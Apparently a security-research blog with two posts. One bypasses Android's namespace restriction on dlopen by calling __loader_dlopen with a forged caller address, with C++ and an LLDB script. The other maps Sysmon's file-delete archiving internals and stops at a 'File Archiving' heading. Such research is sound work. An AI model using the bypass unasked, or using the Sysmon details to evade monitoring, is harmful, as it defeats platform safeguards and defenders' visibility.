undev.ninja

Unrestricting Android Native Dynamic Library Linking

NtRaiseHardError — Thu, 29 Aug 2024 14:31:12 GMT

Introduction

Hacking around Android sometimes requires getting your hands dirty at the native level. While I was on one such escapade, I discovered that Android tends to be quite restrictive about what you can do or interact with on the system. Rightfully so, perhaps: the developer website documents that, starting with Android 7.0, dynamic linking against non-NDK libraries is restricted for stability reasons. The exact level of restriction on certain libraries varies between API levels, as they show in the following diagram.

Native dynamic library linking restrictions based on API level

Well, this is troublesome for the things I want to do so I had to investigate further. There weren't many helpful references online for bypassing these restrictions and only this relatively old (2019) Quarkslab post on Android Runtime Restrictions Bypass gave some idea around how it would be possible. It seems quite involved but there is a simpler workaround without tampering with any internal data structures - or so I think. This is a short post on how it's possible to bypass these restrictions ~~and definitely not stealing from Frida's codebase~~.

Android `dlopen`

Android's dlopen is quite different from the base Linux implementation in that it gets the namespace of the calling function's module and checks it against the namespaces of the target library to open. To do this, the dlopen function reads its own return address from the top of the stack ([rsp]) and passes it as an additional argument to void* __loader_dlopen(const char* filename, int flags, const void* caller_addr).

dlopen:
	jmp    qword ptr [rip + 0xc762] 
	push   0x15                     
	jmp    0x136320                 


dlopen:
	mov    rdx, qword ptr [rsp]     
	jmp    0x41a0                     ; symbol stub for: __loader_dlopen


__loader_dlopen:
	jmp    qword ptr [rip + 0x3f8a] 
	push   0x1                      
	jmp    0x4180                   


__dl___loader_dlopen:
	push   rbp                      
	push   r15                      
	push   r14                      
	push   rbx                      
	push   rax

dlopen passing the return address to __loader_dlopen

In do_dlopen, it will use the caller address to get the calling module's namespace.

void* do_dlopen(const char* name, int flags,
                const android_dlextinfo* extinfo,
                const void* caller_addr) {
  std::string trace_prefix = std::string("dlopen: ") + (name == nullptr ? "(nullptr)" : name);
  ScopedTrace trace(trace_prefix.c_str());
  ScopedTrace loading_trace((trace_prefix + " - loading and linking").c_str());
  soinfo* const caller = find_containing_library(caller_addr);
  android_namespace_t* ns = get_caller_namespace(caller);
  
  ...
}

Start of do_dlopen getting the namespace of the calling module

There is a list of soinfo data structures that contain information about each loaded module, some of which are the module's base address, its size in memory, and its primary namespace.

struct soinfo {
#if defined(__work_around_b_24465209__)
 private:
  char old_name_[SOINFO_NAME_LEN];
#endif
 public:
  const ElfW(Phdr)* phdr;
  size_t phnum;
#if defined(__work_around_b_24465209__)
  ElfW(Addr) unused0; // DO NOT USE, maintained for compatibility.
#endif
  ElfW(Addr) base;
  size_t size;

#if defined(__work_around_b_24465209__)
  uint32_t unused1;  // DO NOT USE, maintained for compatibility.
#endif

  ElfW(Dyn)* dynamic;

#if defined(__work_around_b_24465209__)
  uint32_t unused2; // DO NOT USE, maintained for compatibility
  uint32_t unused3; // DO NOT USE, maintained for compatibility
#endif

  soinfo* next;

...

  // version >= 3
  std::vector<std::string> dt_runpath_;
  android_namespace_t* primary_namespace_;
  android_namespace_list_t secondary_namespaces_;

...

The find_containing_library function will enumerate the list of soinfo to find the module's soinfo by checking if the caller address lies within the module's address range. The head of this list is a global variable called solist which can be obtained using the solist_get_head function.

soinfo* find_containing_library(const void* p) {
  // Addresses within a library may be tagged if they point to globals. Untag
  // them so that the bounds check succeeds.
  ElfW(Addr) address = reinterpret_cast<ElfW(Addr)>(untag_address(p));
  for (soinfo* si = solist_get_head(); si != nullptr; si = si->next) {
    if (address < si->base || address - si->base >= si->size) {
      continue;
    }
    ElfW(Addr) vaddr = address - si->load_bias;
    for (size_t i = 0; i != si->phnum; ++i) {
      const ElfW(Phdr)* phdr = &si->phdr[i];
      if (phdr->p_type != PT_LOAD) {
        continue;
      }
      if (vaddr >= phdr->p_vaddr && vaddr < phdr->p_vaddr + phdr->p_memsz) {
        return si;
      }
    }
  }
  return nullptr;
}

Using the soinfo, it will get its primary namespace.

static android_namespace_t* get_caller_namespace(soinfo* caller) {
  return caller != nullptr ? caller->get_primary_namespace() : g_anonymous_namespace;
}

And somewhere down the call hierarchy, if the calling module's namespace is incompatible with the library's, the loader will reject the request.
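To make the lookup concrete, here is a toy Python model of the two functions above. It is only a sketch: the module list, addresses, and namespace names are made up, and the per-segment PT_LOAD check is left out. The point it illustrates is that the namespace is decided purely by whichever address is handed in as the caller address.

```python
from dataclasses import dataclass
from typing import List, Optional

ANONYMOUS_NAMESPACE = "(anonymous)"  # stand-in for g_anonymous_namespace


@dataclass
class SoInfo:
    name: str
    base: int
    size: int
    primary_namespace: str


def find_containing_library(solist: List[SoInfo], address: int) -> Optional[SoInfo]:
    """Return the module whose [base, base + size) range contains address."""
    for si in solist:
        if si.base <= address < si.base + si.size:
            return si
    return None


def get_caller_namespace(caller: Optional[SoInfo]) -> str:
    """Fall back to the anonymous namespace when no module matches."""
    return caller.primary_namespace if caller is not None else ANONYMOUS_NAMESPACE


# Hypothetical module list; every value here is invented for illustration.
solist = [
    SoInfo("libapp.so", 0x70000000, 0x1000, "app-classloader-namespace"),
    SoInfo("libart.so", 0x71000000, 0x8000, "art-namespace"),
]

# An address inside libart.so resolves to libart.so's own namespace.
caller = find_containing_library(solist, 0x71000010)
print(get_caller_namespace(caller))
```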

Bypassing Restrictions

A namespace is obviously compatible with itself - I hope! So to get the namespace of the library that you want to load, the solution is blindingly trivial: pass an address inside that library as __loader_dlopen's caller_addr argument. An unrestricted dlopen therefore has to call __loader_dlopen directly, which means finding it by parsing linker64's symbols. Procfs can be used to get the initial information.
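As a rough illustration of the procfs step, the following Python sketch pulls a module's base address out of the text of a maps file. The sample contents and paths are invented, and it assumes the lowest mapping of a file is its load base, which may not hold for every layout.

```python
from typing import Optional


def find_module_base(maps_text: str, module_suffix: str) -> Optional[int]:
    """Return the lowest start address of any mapping whose path ends with module_suffix."""
    bases = []
    for line in maps_text.splitlines():
        # Format: start-end perms offset dev inode [path]
        fields = line.split(maxsplit=5)
        if len(fields) < 6 or not fields[5].endswith(module_suffix):
            continue
        start = int(fields[0].split("-")[0], 16)
        bases.append(start)
    return min(bases) if bases else None


# Made-up excerpt in the /proc/<pid>/maps format.
SAMPLE_MAPS = """\
7b2c400000-7b2c440000 r--p 00000000 fd:00 1234 /apex/com.android.runtime/bin/linker64
7b2c440000-7b2c540000 r-xp 00040000 fd:00 1234 /apex/com.android.runtime/bin/linker64
7b2d000000-7b2d200000 r--p 00000000 fd:00 5678 /apex/com.android.art/lib64/libart.so
7b2e000000-7b2e001000 rw-p 00000000 00:00 0
"""

print(hex(find_module_base(SAMPLE_MAPS, "/linker64")))
```

On a device, the same function could be fed the contents of /proc/self/maps instead of the sample string.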

Here is code that parses the symtab symbols to find __loader_dlopen and then uses it as an unrestricted dlopen.

// `file` is assumed to be a const uint8_t* to the linker64 binary read from disk,
// with `ehdr` and `shdr` pointing at its ELF header and section header table.
uint64_t linker64_base = ...;
const ElfW(Sym)* ssym = nullptr;
size_t ssym_size = 0;
const char* sstr_table = nullptr;
void* (*unrestricted_dlopen)(const char*, int, const void*) = nullptr;

// Get the string table and symbol headers.
for (ElfW(Half) i = 0; i < ehdr->e_shnum; i++) {
    if (shdr[i].sh_type == SHT_SYMTAB) {
        ssym = reinterpret_cast<const ElfW(Sym)*>(file + shdr[i].sh_offset);
        // Number of entries in the symbol table.
        ssym_size = shdr[i].sh_size / shdr[i].sh_entsize;
        // sh_link is the index of the associated string table section.
        sstr_table = reinterpret_cast<const char*>(file + shdr[shdr[i].sh_link].sh_offset);
    }
}

// Enumerate the string table and symbols.
for (size_t i = 0; i < ssym_size; i++) {
    if (ssym[i].st_name) {
        const char* sym_name = &sstr_table[ssym[i].st_name];
        // find() returns npos when there is no match, so compare explicitly.
        if (std::string(sym_name).find("__dl___loader_dlopen") != std::string::npos) {
            // Calculate the memory address of __loader_dlopen.
            unrestricted_dlopen = reinterpret_cast<decltype(unrestricted_dlopen)>(
                    linker64_base + ssym[i].st_value);
            break;
        }
    }
}

// Use unrestricted dlopen.
void* libart_base = ...;
void* libart_handle = unrestricted_dlopen("libart.so", RTLD_LAZY, libart_base);

The standard dlsym function works in the same way, but once I had the handle to the library, it didn't seem to have any issues with namespaces... yet.
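The symbol-table walk can also be tried offline. This Python sketch assumes 64-bit little-endian Elf64_Sym entries (24 bytes each) and takes the raw symtab and strtab section bytes as input; the demo tables and symbol values are fabricated purely to exercise the function.

```python
import struct
from typing import Optional

# Elf64_Sym: st_name (u32), st_info (u8), st_other (u8), st_shndx (u16),
#            st_value (u64), st_size (u64)
ELF64_SYM = struct.Struct("<IBBHQQ")


def find_symbol_value(symtab: bytes, strtab: bytes, wanted: str) -> Optional[int]:
    """Return st_value of the first symbol named `wanted`, or None."""
    for offset in range(0, len(symtab) - ELF64_SYM.size + 1, ELF64_SYM.size):
        st_name, _info, _other, _shndx, st_value, _size = ELF64_SYM.unpack_from(symtab, offset)
        if st_name == 0:
            continue  # unnamed entry
        end = strtab.find(b"\0", st_name)
        if end == -1:
            end = len(strtab)
        name = strtab[st_name:end].decode("ascii", "replace")
        if name == wanted:
            return st_value
    return None


def build_demo_tables():
    """Build a tiny fake symtab/strtab pair (values are hypothetical)."""
    strtab = b"\0__dl_dlopen\0__dl___loader_dlopen\0"
    symbols = {b"__dl_dlopen": 0x1000, b"__dl___loader_dlopen": 0x2000}
    symtab = ELF64_SYM.pack(0, 0, 0, 0, 0, 0)  # mandatory null symbol
    for name, value in symbols.items():
        symtab += ELF64_SYM.pack(strtab.index(name), 0x12, 0, 1, value, 0)
    return symtab, strtab


symtab, strtab = build_demo_tables()
print(hex(find_symbol_value(symtab, strtab, "__dl___loader_dlopen")))
```

Adding the returned value to the in-memory base of linker64 gives the runtime address, as in the C++ above.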

Conclusion

It might seem roundabout and unnecessary to build an unrestricted dlopen once you already have code to parse symbols for an arbitrary library. I suppose the other solution is to modify the namespace of your own module by tampering with the solist. But it works!

I also hacked together an LLDB - why have you done this to me, Google - Python script that dumps the soinfo list and each primary namespace if you give it any (ideally solist) starting address.

#!/usr/bin/env python3

import argparse
import lldb
import re
import shlex

from pathlib import Path

SIZEOF_POINTER = 8

# [name, size, pad_size]
SOINFO_DEF = [
    ["phdr", 8, 0],
    ["phnum", 8, 0],
    ["base", 8, 0],
    ["size", 8, 0],
    ["dyn", 8, 0],
    ["next", 8, 0],
    ["flags", 4, 4],
    ["strtab", 8, 0],
    ["symtab", 8, 0],
    ["nbucket", 8, 0],
    ["nchain", 8, 0],
    ["bucket", 8, 0],
    ["chain", 8, 0],
    ["plt_relx", 8, 0],
    ["plt_relx_count", 8, 0],
    ["relx", 8, 0],
    ["relx_count", 8, 0],
    ["preinit_array", 8, 0],
    ["preinit_array_count", 8, 0],
    ["init_array", 8, 0],
    ["init_array_count", 8, 0],
    ["fini_array", 8, 0],
    ["fini_array_count", 8, 0],
    ["init_func", 8, 0],
    ["fini_func", 8, 0],
    ["ref_count", 8, 0],
    ["link_map.l_addr", 8, 0],
    ["link_map.l_name", 8, 0],
    ["link_map.l_ld", 8, 0],
    ["link_map.l_next", 8, 0],
    ["link_map.l_prev", 8, 0],
    ["constructors_called", 1, 7],
    ["load_bias", 8, 0],
    ["has_dt_symbolic", 1, 3],
    ["version", 4, 0],
    ["st_dev", 8, 0],
    ["st_ino", 8, 0],
    ["children", 8, 0],
    ["parents", 8, 0],
    ["file_offset", 8, 0],
    ["rtld_flags", 4, 0],
    ["dt_flags_1", 4, 0],
    ["strtab_size", 8, 0],
    ["gnu_nbucket", 8, 0],
    ["gnu_bucket", 8, 0],
    ["gnu_chain", 8, 0],
    ["gnu_maskwords", 4, 0],
    ["gnu_shift2", 4, 0],
    ["gnu_bloom_filter", 8, 0],
    ["local_group_root", 8, 0],
    ["android_relocs", 8, 0],
    ["android_relocs_size", 8, 0],
    ["soname", 8*3, 0],
    ["realpath", 8*3, 0],
    ["versym", 8, 0],
    ["verdef_ptr", 8, 0],
    ["verdef_cnt", 8, 0],
    ["verneed_ptr", 8, 0],
    ["verneed_cnt", 8, 0],
    ["target_sdk_version", 4, 4],
    ["dt_runpath", 8*3, 0],
    ["primary_namespace", 8, 0],
    ["secondary_namespace.head", 8, 0],
    ["secondary_namespace.tail", 8, 0],
    ["handle", 8, 0]
]

SIZEOF_SOINFO = 0 #len(SOINFO_DEF) * SIZEOF_POINTER
for i in range(len(SOINFO_DEF)):
    SIZEOF_SOINFO += SOINFO_DEF[i][1] + SOINFO_DEF[i][2]

ANDROID_NAMESPACE_DEF = [
    ["name", 8*3, 0],
    ["is_isolated", 2, 0],
    ["is_exempt_list_enabled", 2, 0],
    ["is_also_used_as_anonymous", 2, 2],
    ["ld_library_paths", 8*3, 0],
    ["default_library_paths", 8*3, 0],
    ["permitted_paths", 8*3, 0],
    ["allowed_libs", 8*3, 0],
    ["linked_namespaces", 8*3, 0],
    ["soinfo_list.head", 8, 0],
    ["soinfo_list.tail", 8, 0]
]

SIZEOF_ANDROID_NAMESPACE = 0
for i in range(len(ANDROID_NAMESPACE_DEF)):
    SIZEOF_ANDROID_NAMESPACE += ANDROID_NAMESPACE_DEF[i][1] + ANDROID_NAMESPACE_DEF[i][2]


def resolve_module_name(debugger, addr: int):
    result = lldb.SBCommandReturnObject()
    debugger.GetCommandInterpreter().HandleCommand(f"im loo -va {addr}", result)

    m = re.search(r'file = "(.*)?",', result.GetOutput())
    return m.group(1) if m is not None else None
    

def parse_std_string(process, bytes: bytes):
    try:
        return bytes.decode('utf-8').split('\0')[0].strip()
    except UnicodeDecodeError as e:
        pass

    error = lldb.SBError()
    len = int.from_bytes(bytes[0:8], 'little')
    addr = int.from_bytes(bytes[0x10:0x18], 'little')
    s_bytes = process.ReadMemory(addr, len, error)
    if not error.Success():
        print(f"Error reading memory: {error}")
        return ""

    return s_bytes.decode('utf-8').split('\0')[0].strip()


def parse_android_namespace(process, addr: int, verbose: bool):
    error = lldb.SBError()
    bytes = process.ReadMemory(addr, SIZEOF_ANDROID_NAMESPACE, error)
    if not error.Success():
        return

    # start at 1st index
    android_namespace_index = ANDROID_NAMESPACE_DEF[0][1] + ANDROID_NAMESPACE_DEF[0][2]

    for i in range(1, len(ANDROID_NAMESPACE_DEF)):
        member_size = ANDROID_NAMESPACE_DEF[i][1]
        pad_size = ANDROID_NAMESPACE_DEF[i][2]
        value = int.from_bytes(bytes[android_namespace_index:android_namespace_index+member_size], 'little')

        if verbose:
            print(f"\t[{int(android_namespace_index / SIZEOF_POINTER)}] {ANDROID_NAMESPACE_DEF[i][0]}: {hex(value)}")

        android_namespace_index += member_size + pad_size


def parse_soinfo(debugger, bytes: bytes, verbose: bool):
        process = debugger.GetSelectedTarget().process

        soinfo_index = 0
        soname = parse_std_string(process, bytes[49*8:49*8+8*3])
        
        mod_base = int.from_bytes(bytes[2*8:2*8+8], 'little')
        mod_size = int.from_bytes(bytes[3*8:3*8+8], 'little')
        print(f"Module: {soname} [{hex(mod_base)}-{hex(mod_base + mod_size)}]")
        for i in range(len(SOINFO_DEF)):
            member_size = SOINFO_DEF[i][1]
            pad_size = SOINFO_DEF[i][2]
            value = int.from_bytes(bytes[soinfo_index:soinfo_index+member_size], 'little')

            if SOINFO_DEF[i][0] == "primary_namespace":  # parse primary namespace
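                error = lldb.SBError()
                # Use a separate buffer so the soinfo bytes are not overwritten
                # for the members that follow primary_namespace.
                ns_bytes = process.ReadMemory(value, 8*3, error)
                if error.Success():
                    name = parse_std_string(process, ns_bytes)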
                    print(f"[{int(soinfo_index / SIZEOF_POINTER)}] {SOINFO_DEF[i][0]}: {name} [{hex(value)}]")
                else:
                    print(f"[{int(soinfo_index / SIZEOF_POINTER)}] {SOINFO_DEF[i][0]}: [{hex(value)}]")

                parse_android_namespace(process, value, verbose)
            elif verbose:
                print(f"[{int(soinfo_index / SIZEOF_POINTER)}] {SOINFO_DEF[i][0]}: {hex(value)}")

            soinfo_index += member_size + pad_size
            
        if verbose:
            print()


def enum_solist(debugger, command, result, dict):
    comm_args = shlex.split(command)

    desc = """Enumerate and print information of the solist."""
    parser = argparse.ArgumentParser(
        description=desc,
        prog='enum_solist'
    )
    parser.add_argument(
        'address',
        help='address of an solist'
    )

    parser.add_argument(
        '-v',
        "--verbose",
        action='store_true',
        help='verbose output of soinfo structure'
    )

    try:
        args = parser.parse_args(comm_args)
    except SystemExit:
        # argparse raises SystemExit (not Exception) on bad arguments or --help.
        return

    start_addr = int(args.address, 0)

    target = debugger.GetSelectedTarget()
    if not target:
        print("Error: invalid target", file=result)
        return

    process = target.process
    if not process:
        print("Error: invalid process", file=result)
        return

    error = lldb.SBError()

    curr_soinfo_addr = start_addr
    while curr_soinfo_addr != 0:
        bytes = process.ReadMemory(curr_soinfo_addr, SIZEOF_SOINFO, error)
        if not error.Success():
            print(f"Error: {error.GetCString()}", file=result)
            return
        
        parse_soinfo(debugger, bytes, args.verbose)
        curr_soinfo_addr = int.from_bytes(bytes[5*8:5*8+8], 'little')
        

lldb.debugger.HandleCommand(
    "command script add -f enum_solist.enum_solist enum_solist")
print("A new command called 'enum_solist' was added, type 'enum_solist --help' for more information.")
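The script hard-codes a couple of offsets (5*8 for next, 49*8 for soname). A small helper can derive them from the same [name, size, pad_size] tables instead; the sketch below uses only the first few soinfo entries so that it stays self-contained, and field_offset is a name I made up for it.

```python
def field_offset(defs, name):
    """Sum size + padding of every member that precedes `name`."""
    offset = 0
    for field_name, size, pad in defs:
        if field_name == name:
            return offset
        offset += size + pad
    raise KeyError(name)


# First entries of SOINFO_DEF, copied from the script above.
SOINFO_HEAD = [
    ["phdr", 8, 0],
    ["phnum", 8, 0],
    ["base", 8, 0],
    ["size", 8, 0],
    ["dyn", 8, 0],
    ["next", 8, 0],
    ["flags", 4, 4],
    ["strtab", 8, 0],
]

print(field_offset(SOINFO_HEAD, "next"))
```

Run against the full SOINFO_DEF table, the same helper should land on 392 (49*8) for soname, matching the hard-coded slice in parse_soinfo.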

Sysmon Internals - From File Delete Event to Kernel Code Execution

NtRaiseHardError — Wed, 27 Dec 2023 12:19:00 GMT

Introduction

In April 2020, Mark Russinovich announced the release of a new event type for Sysmon version 11.0: event ID 23, File Delete. As indicated by the name, it logs file delete events that occur on the system. Alongside it came the ability to archive files marked for deletion, enabling defenders to track tools dropped by malware to better understand the actor's capabilities and develop signatures. This article will discuss the internals of Sysmon version 11.11 to gain insight into how it operates and its limitations. I briefly checked Sysmon version 12.0, which was released (September 17, 2020) during the writing of this article, and the code for this event looks almost identical, so the information should still be mostly relevant.

Before beginning the article, a huge thank you to Samir for the collaborative effort on this journey.

File Delete Conditions

Let's first understand the conditions under which the file delete event will be triggered. The file events are handled almost entirely by the SysmonDrv.sys driver through the minifilter component. Specifically, it monitors three I/O request packets (IRPs): IRP_MJ_CREATE, IRP_MJ_CLEANUP, and IRP_MJ_WRITE, for file creates, complete handle closes (reference count on a file object reaching zero), and writes respectively.

IRP_MJ_CREATE

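The purpose of this IRP in the context of file deletes is to handle two situations: file overwrites and file deletes using the FLAG_FILE_DELETE_ON_CLOSE option (FILE_FLAG_DELETE_ON_CLOSE in the Win32 API, which corresponds to the FILE_DELETE_ON_CLOSE create option in the kernel).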

File overwrite versus FLAG_FILE_DELETE_ON_CLOSE

Sysmon first checks whether the file was opened with FLAG_FILE_DELETE_ON_CLOSE and, if it was, matches the operation against the configuration's filter rules. If the conditions are met, the delete event will be created and the file will be archived in the IRP_MJ_CLEANUP request when all the handles to the file are closed.

On the other hand, if the file already exists and is being opened with overwrite intent (disposition value is either FILE_OVERWRITE or FILE_OVERWRITE_IF), the driver will attempt to open the file with FltCreateFile. If the function fails with STATUS_OBJECT_NAME_NOT_FOUND, the file doesn't exist and Sysmon will pass it on to be handled as a file create event. Otherwise, if it returns successfully, the target file exists and will be archived immediately, creating the delete event in tandem.

IRP_MJ_CLEANUP

As mentioned before, this request is sent when all of the referenced handles to a file have been closed. Sysmon handles this request by checking the DeletePending flag in the file object and archiving the file if it's set. In the case of FLAG_FILE_DELETE_ON_CLOSE, Sysmon will explicitly set the file's delete disposition to true using FltSetInformationFile with FileDispositionInformation before checking the DeletePending flag.

File is archived if DeletePending is set

IRP_MJ_WRITE

Sysmon also considers file content overwrites instead of just classic file deletes. To meet this condition, the write must originate from user mode, the write size must be greater than or equal to the size of the target file, and the write must start at offset zero.

File write should start at offset 0 and be greater than or equal to the file size

Sysmon will then read the first byte of the file before iterating through each byte of the buffer that will be written. To trigger the file archiving and delete event, all of the bytes must match the first recorded byte. Sysmon refers to this as shredding where all bytes of the overwrite are the same, e.g. AAAAAAA....
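The conditions above can be summed up in a few lines of Python. This is my reading of the checks rather than Sysmon's actual code: the function and parameter names are invented, and it assumes the comparison byte is the first byte Sysmon recorded from the file.

```python
def is_shredding_write(file_size: int, write_offset: int, buffer: bytes,
                       first_recorded_byte: int, from_user_mode: bool = True) -> bool:
    """Model of the IRP_MJ_WRITE conditions described in the text."""
    if not from_user_mode:
        return False
    if write_offset != 0:
        return False          # write must start at offset 0
    if not buffer or len(buffer) < file_size:
        return False          # write must cover the whole file
    # Every byte written must equal the recorded first byte.
    return all(b == first_recorded_byte for b in buffer)


print(is_shredding_write(7, 0, b"AAAAAAA", ord("A")))
print(is_shredding_write(7, 0, b"AAAAAAB", ord("A")))
```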

There is one more condition under IRP_MJ_WRITE which triggers the archive and delete event; however, I was unable to trigger it or trace the conditions required. Perhaps this is an upcoming feature?

Internals

Now that the conditions of file delete events have been covered, let's investigate the implementation details.

File Delete Requirements

The first function to cover is one I call CheckAndQueueFileDeleteEvent and its main purpose is to check if the target file should be archived and if a delete event should be logged. It achieves this in several ways with a few initial checks. If any of the following conditions are met, the file delete event will be bypassed:

The operation is made by the registered service process (should be Sysmon64.exe),
The delete event was not set in the configuration,
The target file is a device or directory,
The file is empty,
The file's parent directory is the archive directory.

After these initial checks, the function will retrieve the file's extension using FltParseFileNameInformation and also check if the file is an executable by using a few FltReadFile calls to read the MZ signature at offset 0 and the PE signature located through the header offset stored at 0x3C. These values are returned back to the caller along with the image file name responsible for the operation.

Checking for PE executable signatures
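For reference, the same signature test is easy to express in user mode. The sketch below follows the standard PE layout (the 4-byte field at 0x3C, e_lfanew, holds the offset of the "PE\0\0" signature); it illustrates the file format and is not a reconstruction of the driver's code. make_minimal_header is just a helper for producing test input.

```python
import struct


def looks_like_pe(data: bytes) -> bool:
    """Check for 'MZ' at offset 0 and 'PE\\0\\0' at the offset stored at 0x3C."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def make_minimal_header(e_lfanew: int = 0x80) -> bytes:
    """Build the smallest buffer that passes the check (not a loadable image)."""
    header = bytearray(e_lfanew + 4)
    header[0:2] = b"MZ"
    struct.pack_into("<I", header, 0x3C, e_lfanew)
    header[e_lfanew:e_lfanew + 4] = b"PE\0\0"
    return bytes(header)


print(looks_like_pe(make_minimal_header()))
```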

Finally, it makes a call to a function I labelled QueueFileDeleteEvent to perform a final check if the file should be archived and logged.

Reporting File Delete Events

The following represents the proprietary file delete event structure:

typedef struct _FILE_DELETE_EVENT {
	/*   0 */ ULONG Id;          // 0xF0000000 for file delete.
	/*   4 */ ULONG Size;        // Struct size.
	/*   8 */ PVOID Unk1;
	/*  10 */ PVOID Unk2;
	/*  18 */ HANDLE ProcessHandle;
	/*  20 */ PKSYSTEM_TIME SystemUtcTime;
	/*  28 */ ULONG HashMethod;
	/*  2C */ BOOLEAN IsExecutable;
	/*  30 */ ULONG SidLength;
	/*  34 */ ULONG ObjectNameLength;
	/*  38 */ ULONG ImageFileNameLength;
	/*  3C */ ULONG HashLength;
	/*  40 */ WCHAR StatusString[256];
	/* 240 */ PEPROCESS ServiceProcessHandle;	// Actually a PEPROCESS object.
	/* 248 */ PKEVENT Event;
	/* 250 */ PBOOLEAN IsArchivedAddress;
	/* 258 */ // User SID.
	/* xxx */ // Object name.
	/* xxx */ // Image file name.
	/* xxx */ // File hash.
} FILE_DELETE_EVENT, * PFILE_DELETE_EVENT;

File delete event structure
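One way to sanity-check the offsets in the structure above is to mirror it with ctypes and let Python compute the layout. Pointers and handles are modelled as 64-bit integers and WCHAR as a 16-bit integer so that the result does not depend on the host platform; parse_file_delete_event is a hypothetical helper, not something from Sysmon.

```python
import ctypes

FILE_DELETE_EVENT_ID = 0xF0000000


class FileDeleteEvent(ctypes.Structure):
    _fields_ = [
        ("Id", ctypes.c_uint32),
        ("Size", ctypes.c_uint32),
        ("Unk1", ctypes.c_uint64),
        ("Unk2", ctypes.c_uint64),
        ("ProcessHandle", ctypes.c_uint64),
        ("SystemUtcTime", ctypes.c_uint64),
        ("HashMethod", ctypes.c_uint32),
        ("IsExecutable", ctypes.c_uint8),
        ("SidLength", ctypes.c_uint32),
        ("ObjectNameLength", ctypes.c_uint32),
        ("ImageFileNameLength", ctypes.c_uint32),
        ("HashLength", ctypes.c_uint32),
        ("StatusString", ctypes.c_uint16 * 256),
        ("ServiceProcessHandle", ctypes.c_uint64),
        ("Event", ctypes.c_uint64),
        ("IsArchivedAddress", ctypes.c_uint64),
    ]


def parse_file_delete_event(buffer: bytes):
    """Return the fixed-size header if the buffer holds a file delete event, else None."""
    if len(buffer) < ctypes.sizeof(FileDeleteEvent):
        return None
    event = FileDeleteEvent.from_buffer_copy(buffer)
    if event.Id != FILE_DELETE_EVENT_ID:
        return None
    return event


print(hex(FileDeleteEvent.StatusString.offset), hex(ctypes.sizeof(FileDeleteEvent)))
```

The variable-length data (SID, object name, image file name, hash) follows the fixed header and would be sliced out using the four length members.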

The event is allocated and set in QueueFileDeleteEvent. But besides the obvious purpose of reporting file delete event data, it has another important, secondary purpose. The tenth argument to this function is a pointer that represents the boolean value of whether the target file should be archived. Although this pointer is optional, if it is a valid, non-zero value, this function serves to pass the event data to Sysmon64.exe via an event queue to be checked against the filter conditions provided in the configuration file.

Valid tenth argument

This explains the existence of the Event, IsArchivedAddress, and ServiceProcessHandle members of the FILE_DELETE_EVENT structure. After initialising these values and the structure, the event is queued in a function I labelled QueueEvent and the thread is blocked using KeWaitForMultipleObjects, waiting on either the Event or the Sysmon64.exe process.

Thread blocking after queuing file delete event

To understand this further, we need to know how events are reported from the driver to Sysmon64.exe.

QueueEvent

Sysmon utilises a doubly linked list to queue up events. In this article, I will refer to it as g_EventReportList. This function is relatively straightforward: if the event size is not greater than 0x3FCB8 + 0x348 (0x40000), it will be appended to g_EventReportList; otherwise, an incorrect event size error will be created. Since we are not concerned about the error event, we'll skip it for brevity.

An allocation for a new data structure is created to wrap the event argument:

typedef struct _EVENT_REPORT {
    /*  0 */ LIST_ENTRY ListEntry;
    /* 10 */ ULONG EventDataSize;
    /* 18 */ PVOID EventData;
} EVENT_REPORT, *PEVENT_REPORT;

EventData points to the event and its size is stored in EventDataSize. After filling this structure, the EVENT_REPORT is appended to g_EventReportList if the number of entries is less than 50000. If there are 50000 entries, the first item in the queue is removed and deallocated.

Allocating and appending new event to g_EventReportList

Retrieving Events

Once events are queued, Sysmon64.exe can read them one by one through the driver's device control dispatch with the I/O control code 0x83400004.

Reading the first event on the queue through the device control dispatch

In the context of the file delete event, Sysmon64.exe will check for a valid Event member.

Sysmon64.exe checking for valid Event member

If it's valid, a filter check will be performed to determine if the target file object should be archived and a file delete event launched. The following data structure will be initialised and sent to the driver:

typedef struct _SET_ARCHIVED_INFO {
    /*  0 */ BOOLEAN IsArchived;
    /*  8 */ PEPROCESS ServiceProcessHandle;	// Service process.
    /* 10 */ PKEVENT Event;
    /* 18 */ PBOOLEAN IsArchivedAddress;
} SET_ARCHIVED_INFO, *PSET_ARCHIVED_INFO;

The IsArchived value is set depending on the return value of the function that checks for filter matching. Using DeviceIoControl, Sysmon will send the above structure back to the driver with the 0x83400010 I/O control code.

Sysmon64.exe responding with whether the file should be logged

Back in the driver's device control dispatch, the value in IsArchivedAddress will be set to IsArchived (!) before signalling the event to unblock QueueFileDeleteEvent.

Device control dispatch setting IsArchived value and signalling QueueFileDeleteEvent's wait

Once QueueFileDeleteEvent is signalled and unblocked, it will return the IsArchived value back through the tenth argument which is then returned again from CheckAndQueueFileDeleteEvent.
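The round trip is essentially a blocking request and reply. As a loose analogy only, the following Python sketch models it with two threads: one plays the driver thread blocked in QueueFileDeleteEvent, the other plays Sysmon64.exe answering with the filter verdict. All names are invented and nothing here talks to a real driver.

```python
import threading


class PendingDeleteEvent:
    """Stands in for the Event and IsArchivedAddress pair carried by the event."""

    def __init__(self):
        self.event = threading.Event()
        self.is_archived = False


def service_send_verdict(pending: PendingDeleteEvent, matches_filter: bool) -> None:
    """Service side: write the verdict, then signal the waiting thread."""
    pending.is_archived = bool(matches_filter)
    pending.event.set()


def driver_wait_for_verdict(pending: PendingDeleteEvent, timeout: float = 5.0) -> bool:
    """Driver side: block until signalled, then return the verdict."""
    if not pending.event.wait(timeout):
        return False
    return pending.is_archived


def round_trip(matches_filter: bool) -> bool:
    pending = PendingDeleteEvent()
    service = threading.Thread(target=service_send_verdict, args=(pending, matches_filter))
    service.start()
    verdict = driver_wait_for_verdict(pending)
    service.join()
    return verdict


print(round_trip(True), round_trip(False))
```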

The return value is used in two locations: the IRP_MJ_CREATE with FLAG_FILE_DELETE_ON_CLOSE and in the ArchiveFile function. The former triggers the file delete event and archiving in the IRP_MJ_CLEANUP request by setting the CompletionContext value to 1 so that it can be handled in the minifilter's post operation.

Notifying post operation to handle FLAG_FILE_DELETE_ON_CLOSE files

The post operation routine simply allocates and sets a stream handle context with a size of two bytes. If the CompletionContext value is 1, the stream handle context will be set to the value of 0.

In post operation, set stream handle context to 0 if CompletionContext is 1

When the IRP_MJ_CLEANUP request is sent on handle close, it will check the stream handle context for 0 and set the target file's delete disposition.

Setting delete disposition if the stream handle context value is 0

File Archiving

